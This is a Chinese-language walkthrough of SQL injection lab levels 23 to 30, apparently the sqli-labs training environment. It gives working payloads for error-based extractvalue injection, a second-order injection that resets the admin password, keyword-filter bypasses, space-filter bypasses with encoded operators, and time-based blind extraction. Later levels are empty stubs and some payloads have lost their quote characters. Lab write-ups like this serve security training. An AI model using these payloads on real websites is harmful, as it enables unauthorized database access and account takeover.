员工入职 在哪个网站做招工,怎么做国际货运代理外贸网站,沈阳建设企业网站,培训机构做网站宣传level-23 #xff08;注释被过滤#xff09; 抓包#xff0c;查看正常请求和响应。 略 尝试是否存在注入 id1’,id1’#xff0c;成周期性变化 尝试 POC
POC: id1andextractValue(1,concat(0x7e,user()))-- 结果#xff1a;failed。怀疑–被过滤掉了#xff0c;尝试…level-23 注释被过滤 抓包查看正常请求和响应。 略 尝试是否存在注入 id1’,id1’成周期性变化 尝试 POC
POC: id1andextractValue(1,concat(0x7e,user()))-- 结果failed。怀疑–被过滤掉了尝试前后闭合方案
POC: id1andextractValue(1,concat(0x7e,user()))and
结果ok。
level-24(二次注入)
这一关是用类admin的账号去修改admin的密码。 思路如下 1我们注册一个admin-- 、admin#、admin and 1、admin or 1 的账号。这是第一次注入 2我们通过这个账号修改密码来修改隐藏的admin账户的密码。这是第二次注入 第一个在这里是为了闭合前面的 -- 后者#这里起到注释的效果 列出更改密码的sql更好理解
usernamesqladmin-- update table_x set pasword123 where usernameadmin-- and password456;admin#update table_x set pasword123 where usernameadmin#-- and password456;admin and 1update table_x set pasword123 where usernameadmin#-- and password456;admin or 1update table_x set pasword123 where usernameadmin#-- or password456; 注册账号 注意--后面是有空格否则起不到注释的效果 登录新账号修改密码456 验证密码456 》 成功登录admin
level-25 (and、or被过滤) 抓包查看正常请求和响应 尝试是否存在注入 存在 尝试POC
POCid-1orextractValue(1,concat(0x73,user()))--
发现and,or关键字被屏蔽了还是不区分大小写的屏蔽 使用union 结果成功注入
使用aandnd/anandd -- and
POC: id-1aandndextractValue(1,concat(0x73,user()))-- level-25a(and、or被过滤盲注) 抓包查看正常请求和响应 略 尝试是否存在注入 POCid1 and if(1,sleep(3),sleep(0))-- 》不休眠 POCid1 and if(1,sleep(3),sleep(0))-- 》休眠
》存在注入 尝试POC step1: 猜字符串长度POC: id1aandndif(length(user())§1§,sleep(3),0)-- 》14
step2猜每个字符 POC: id1aandndif(substr(user(),§1§,1)§a§,sleep(3),0)-- 》rootlocalhost
level-26 (空格、注释被过滤)
抓包查看正常请求和响应 尝试是否存在注入
使用单双引号发现输出周期性变化存在注入
尝试POC
POC: unionselect1,user(),3-- 空格被过滤了 》 因为空格被过滤了所以and,union都使用不了--也使用不了 寻找其他替代方案替代and后’闭合替换--
尝试 POC: id1extractvalue(1,concat(0x7e,user(),0x7e)) //字符串拼接 》 无反应 POC: id1extractvalue(1,concat(0x7e,user(),0x7e)) //逻辑
POC: id1%26extractvalue(1,concat(0x7e,user(),0x7e))%26 //字符串拼接使用%编码 》 成功爆出
POC: id1%26%26extractvalue(1,concat(0x7e,user(),0x7e))%26%26 //使用%编码
》 成功爆出
POC: id1|extractvalue(1,concat(0x7e,user(),0x7e))| //使用| 》 成功爆出
POC: id1||extractvalue(1,concat(0x7e,user(),0x7e))|| //使用|| 》 成功爆出
POC: id1%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c //|使用%编码 》 成功爆出
POC: id1%7c%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c%7c //||使用%编码 》 成功爆出
总结 空格别过滤了试试|||以及他们的%编码因为空格被过滤了不能使用--
level-26a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-27 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-27a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-28 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-28a () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-29 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC
level-30 () 抓包查看正常请求和响应 尝试是否存在注入 尝试POC